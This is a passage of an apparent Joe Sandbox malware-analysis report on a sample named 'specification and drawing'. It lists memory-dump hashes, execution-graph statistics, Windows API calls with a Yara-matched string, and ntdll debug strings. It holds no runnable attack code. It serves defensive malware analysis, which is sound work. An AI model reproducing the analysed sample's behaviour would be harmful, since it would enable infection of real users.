                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d6f09d9e50ffba434db48a0b8e4d725a987a4943dd471057e5f6ab1f9ac6de19
                                                                                                          • Instruction ID: ed41a5367ba838881670cdbca436fcb3bd209cae4b70cafed3fc1b6ed78e485e
                                                                                                          • Opcode Fuzzy Hash: d6f09d9e50ffba434db48a0b8e4d725a987a4943dd471057e5f6ab1f9ac6de19
                                                                                                          • Instruction Fuzzy Hash: C6E1F9B4E1025A8FDB14DFA9C590AAEBBF2FF49304F248269D514AB355D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65ecffdd1ab9f0015c8a29df11b4c29e7ce33870ce91779942e186f354e612a4
                                                                                                          • Instruction ID: 64f2b42399e4ad89fb8c36d31d8129f7caf8fbe5f97091b8b3868a289142dcd9
                                                                                                          • Opcode Fuzzy Hash: 65ecffdd1ab9f0015c8a29df11b4c29e7ce33870ce91779942e186f354e612a4
                                                                                                          • Instruction Fuzzy Hash: FCE119B4E1025A8FDB14DF99C590AAEBBF2FF49304F248159D414AB395D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a2ad317e3a6f3df77fc2190543bd7aaa91aaeaefd0c27b2fabd25f85fb2c485d
                                                                                                          • Instruction ID: 7a7ba47560ef73e5f9389c2e1985622b4dfeef751a007b44e11069d4df0ce4e0
                                                                                                          • Opcode Fuzzy Hash: a2ad317e3a6f3df77fc2190543bd7aaa91aaeaefd0c27b2fabd25f85fb2c485d
                                                                                                          • Instruction Fuzzy Hash: 50E109B4E1025A8FDB14DFA9C590AAEBBF2FF89304F248259D514A7395D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 82cba19434735484fbbbe7e19377b071850cece044534d313c7c0e4f7832f8c1
                                                                                                          • Instruction ID: b840eea56e7af7b78f8f9b70913367a18067d9f0fa5fedd9184cb1aea106ab44
                                                                                                          • Opcode Fuzzy Hash: 82cba19434735484fbbbe7e19377b071850cece044534d313c7c0e4f7832f8c1
                                                                                                          • Instruction Fuzzy Hash: 8CE108B4E1025A8FDB14DFA9C590AAEBBF2FF89304F248259D514AB355D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e0e7e4d7b49f4396dfb4c506430c707d6c6abed9b34eb783a0526066aedd1f06
                                                                                                          • Instruction ID: 1e240642d4d3c11d28fa578d7752336a6993fb03b6b372ae0d676dedea74a166
                                                                                                          • Opcode Fuzzy Hash: e0e7e4d7b49f4396dfb4c506430c707d6c6abed9b34eb783a0526066aedd1f06
                                                                                                          • Instruction Fuzzy Hash: 77A16E32E0032A8FCF05DFA8C8485EEBBF6BF85304B15456AE905AB2A5DB71D955CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 88298417ad12907742eb9aacfa143846ec29551237181616a5ff95561050071a
                                                                                                          • Instruction ID: c67326f27619afd3fb9e3c93c29b595dbd5b4cb2fd493ff9340c9a2f7db5525c
                                                                                                          • Opcode Fuzzy Hash: 88298417ad12907742eb9aacfa143846ec29551237181616a5ff95561050071a
                                                                                                          • Instruction Fuzzy Hash: 55A12974E00209DFDB04EFB8D4947AEBBF6AF88300F108569E505EB395DA35AD81CB95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 45fa91067191248484623359f150d49d74588bd053c9b760308d290b1f88794e
                                                                                                          • Instruction ID: 759a01bf4d02cc0deef34343baf24816d686b610d4378fb502ed951c4ec4112c
                                                                                                          • Opcode Fuzzy Hash: 45fa91067191248484623359f150d49d74588bd053c9b760308d290b1f88794e
                                                                                                          • Instruction Fuzzy Hash: 40C171B5E00659CFDB58CF6AC9846DDBBF2BF89301F14C1A9D809AB364DB305A858F50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a618565078f1a59096896bb7e8771765e773f8eb860eaf51af49f50e545b5b72
                                                                                                          • Instruction ID: 39fc8ba3efd2db7ab74a02eb6e9a3dea646463a6be7e1f2f2058e743646555a5
                                                                                                          • Opcode Fuzzy Hash: a618565078f1a59096896bb7e8771765e773f8eb860eaf51af49f50e545b5b72
                                                                                                          • Instruction Fuzzy Hash: 3061D971A2064A8FD748DFAAE84569ABFF2FBC8300F14D52AD504AB358DF745909DF40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 651f2b27d88eb3a5469e7a2dcd3849354f15c224562fb7789227a302752e9036
                                                                                                          • Instruction ID: e572b8e6e57a2092ccd25cdb4a1525b37a0b2d931c434bc5361a84fc40f927eb
                                                                                                          • Opcode Fuzzy Hash: 651f2b27d88eb3a5469e7a2dcd3849354f15c224562fb7789227a302752e9036
                                                                                                          • Instruction Fuzzy Hash: 1361E871A2064A8FD748EFAAE84569ABFF2FBC8300F14D12AD504AB358DF745909DF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5c76adfc77a1f047b15efd88b73f472a75eb7a897f7229721908b6f59b7f3ff7
                                                                                                          • Instruction ID: 7ed5b6a41454fdf54b954b71750e7ad608dd2b93c4efe7f5933f22409e7dc17b
                                                                                                          • Opcode Fuzzy Hash: 5c76adfc77a1f047b15efd88b73f472a75eb7a897f7229721908b6f59b7f3ff7
                                                                                                          • Instruction Fuzzy Hash: 9851F7B1E1025A8BDB14CFA9C5806AEBBF2FF89305F248169D418A7355D7319D42CFA1

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:1.3%
                                                                                                          Dynamic/Decrypted Code Coverage:5%
                                                                                                          Signature Coverage:7.9%
                                                                                                          Total number of Nodes:139
                                                                                                          Total number of Limit Nodes:7

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 187 417ba3-417bcc call 42f863 190 417bd2-417be0 call 42fe63 187->190 191 417bce-417bd1 187->191 194 417bf0-417c01 call 42e303 190->194 195 417be2-417bed call 430103 190->195 200 417c03-417c17 LdrLoadDll 194->200 201 417c1a-417c1d 194->201 195->194 200->201
                                                                                                          APIs
                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C15
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 2234796835-0
                                                                                                          • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction ID: 29541c4c1cb86a97046c076e925ce7a07987024d856869177c45976850981732
                                                                                                          • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction Fuzzy Hash: 9A0125B5E0410DABDF10DBE5DC42FDEB3789B54308F0041A6E91897241F635EB588795

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 212 42cb93-42cbcf call 404923 call 42ddf3 NtClose
                                                                                                          APIs
                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CBCA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction ID: b76cf9a5bfc1315908a28204a52b0b2c49534136212ae28f732410f805bb8f60
                                                                                                          • Opcode Fuzzy Hash: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction Fuzzy Hash: 91E04F762412547BD620AA6AEC41F9B776DDBC5714F404429FA0967141CAB4790187A4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 371 1102b60-1102b6c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                          • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                                                                                          • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                          • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                          • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                                                                          • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                          • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 372 1102c70-1102c7c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                          • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                                                                          • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                          • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                          • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                                                                                          • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                          • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 0 4143ac-4143ae 1 4143b0-4143bc 0->1 2 414429-41443d 0->2 3 414373-414390 1->3 4 4143be-4143ca 1->4 5 41445d-414463 2->5 6 41443f-41444e PostThreadMessageW 2->6 3->0 6->5 7 414450-41445a 6->7 7->5
                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: 2361o4QI$2361o4QI
                                                                                                          • API String ID: 1836367815-3806180685
                                                                                                          • Opcode ID: e2d99c1290c8e791b22f7134dbcd5559d0a492aa6781d34470d3428f2b1c55b5
                                                                                                          • Instruction ID: 5114dfc27e37c2844b5d0d952bbf8d8a230acc9a7d7e3ddd19e2c65ec9fb8e41
                                                                                                          • Opcode Fuzzy Hash: e2d99c1290c8e791b22f7134dbcd5559d0a492aa6781d34470d3428f2b1c55b5
                                                                                                          • Instruction Fuzzy Hash: D30170337442697ADB1655E82C928FAF7DDDFC3365704816EEA95C7252C3154C038395

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: 2361o4QI$2361o4QI
                                                                                                          • API String ID: 1836367815-3806180685
                                                                                                          • Opcode ID: bdaeac2891d156e517c70cce5b2a1b228c92b2475f2606c63c77cf88c13d6fd5
                                                                                                          • Instruction ID: f6bc12b4a7e54384fc08b28754581a0646dab71cd1bb19be4be7fabdc026553b
                                                                                                          • Opcode Fuzzy Hash: bdaeac2891d156e517c70cce5b2a1b228c92b2475f2606c63c77cf88c13d6fd5
                                                                                                          • Instruction Fuzzy Hash: 9F1129B1D0025C7AEB11AAE19C81DEFBB7C9F41358F448069FA44B7101D5785E068BA5

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: 2361o4QI$2361o4QI
                                                                                                          • API String ID: 1836367815-3806180685
                                                                                                          • Opcode ID: 05357d2f48808b187999a6c1e57de2fcecde43931fb71b34567b6fbaf915147e
                                                                                                          • Instruction ID: 530b1707573153fa9b7f38926838a4d04c1a85311558d4362bc03077739b09d9
                                                                                                          • Opcode Fuzzy Hash: 05357d2f48808b187999a6c1e57de2fcecde43931fb71b34567b6fbaf915147e
                                                                                                          • Instruction Fuzzy Hash: 8701DBB1D0011C7AEB10AAE19C81DEF7B7CDF41798F448069FA14B7241D5785E068BB5

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 202 42ceb3-42cef4 call 404923 call 42ddf3 RtlAllocateHeap
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,0041E99E,?,?,00000000,?,0041E99E,?,?,?), ref: 0042CEEF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                          • Instruction ID: 30e79609f481ea63e4db638f7a1dac92b35ebc6749900525827dc58393b69420
                                                                                                          • Opcode Fuzzy Hash: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                          • Instruction Fuzzy Hash: 83E092B6204214BFD614EE69EC41FEF37ADEFC9710F404029F909A7241CA74B9108BB8

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 207 42cf03-42cf44 call 404923 call 42ddf3 RtlFreeHeap
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4D8B4674,00000007,00000000,00000004,00000000,0041742C,000000F4), ref: 0042CF3F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 3298025750-0
                                                                                                          • Opcode ID: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction ID: 93d52155cd82351b0253c774491d9607e7b819bc1e9d4196672af213d8618792
                                                                                                          • Opcode Fuzzy Hash: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction Fuzzy Hash: C2E06DB6204204BBC614EE59DC45EDB73ACEFC9714F004019FA08A7242DA74B91087B4

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 217 42cf53-42cf8f call 404923 call 42ddf3 ExitProcess
                                                                                                          APIs
                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,40B9B70A,?,?,40B9B70A), ref: 0042CF8A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 621844428-0
                                                                                                          • Opcode ID: 93c9f9102f68108a7200f743b159bea482fc89f88471024d8a2ed1e98eb2cdd2
                                                                                                          • Instruction ID: 5a3f9d1a4c76ec654bf4906ff3ec58e68c58e48e86c582a1c5830d33f06476cf
                                                                                                          • Opcode Fuzzy Hash: 93c9f9102f68108a7200f743b159bea482fc89f88471024d8a2ed1e98eb2cdd2
                                                                                                          • Instruction Fuzzy Hash: 81E04676240614BBD620AB6AEC41FEB776DEBC5710F00412AFA08A7241CAB9B91086E4

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 367 1102c0a-1102c0f 368 1102c11-1102c18 367->368 369 1102c1f-1102c26 LdrInitializeThunk 367->369
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                                                                          • Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
                                                                                                          • Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                                                                          • Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275
                                                                                                          Strings
                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                                                                                          • The resource is owned shared by %d threads, xrefs: 01178E2E
                                                                                                          • an invalid address, %p, xrefs: 01178F7F
                                                                                                          • *** then kb to get the faulting stack, xrefs: 01178FCC
                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
                                                                                                          • *** Inpage error in %ws:%s, xrefs: 01178EC8
                                                                                                          • <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                                                                                          • *** enter .cxr %p for the context, xrefs: 01178FBD
                                                                                                          • read from, xrefs: 01178F5D, 01178F62
                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 01178EE2
                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                                                                                          • The instruction at %p tried to %s , xrefs: 01178F66
                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                                                                                          • This failed because of error %Ix., xrefs: 01178EF6
                                                                                                          • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
                                                                                                          • a NULL pointer, xrefs: 01178F90
                                                                                                          • write to, xrefs: 01178F56
                                                                                                          • The critical section is owned by thread %p., xrefs: 01178E69
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                          • API String ID: 0-108210295
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-2160512332
                                                                                                          Strings
                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                                                                                          • Thread identifier, xrefs: 0113553A
                                                                                                          • Critical section address., xrefs: 01135502
                                                                                                          • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
